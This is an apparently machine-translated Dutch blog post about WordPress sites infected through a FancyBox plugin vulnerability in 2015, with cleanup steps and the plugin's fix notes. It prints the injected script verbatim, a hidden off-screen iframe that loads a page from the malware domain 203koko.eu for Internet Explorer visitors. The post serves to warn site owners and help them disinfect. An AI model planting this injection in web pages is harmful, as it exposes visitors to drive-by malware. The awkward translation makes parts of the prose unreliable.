Eerder deze week een aantal websites en blogs WordPress, waarschuwingen ontvangen van besmet met malware door middel van Google Webmasters.
Het probleem dat Google Webmasters aangeduid is de aanwezigheid van een code / script iframe-malware de bron webpagina.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Het lijkt erop dat het een kwetsbaarheid a inpluggenacquis FancyBox voor WordPress die tot gisteren (05.02.2015) niet was bijgewerkt voor een lange tijd.
Het oplossen van dit probleem en desinfecteren van de besmette sites met deze malware, is relatief eenvoudig.
1. Schakel de FancyBox-plug-in uit.
2. Verwijder alle FancyBox plug-in bestanden van de server (via FTP)
3. Installeer de nieuwe versie van de plug-in (FancyBox 3.0.4)
FancyBox voor WordPress 3.0.4
- Hernoemd naar de instelling die wordt beïnvloed door het beveiligingsprobleem dat wordt genoemd in 3.0.3. Dit zou moeten voorkomen dat de kwaadaardige code verschijnt op sites waar de plug-in is updated zonder de kwaadaardige code te verwijderen.
FancyBox voor WordPress 3.0.3
- Vast een beveiligingsprobleem.
Malware-informatie:
TYPE: Iframe redirection
TARGET: WordPress fancybox
MALWARE DOMEIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODES:
MALWARE GESCHREVEN: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Malware verwijderen van uw WordPress van de.
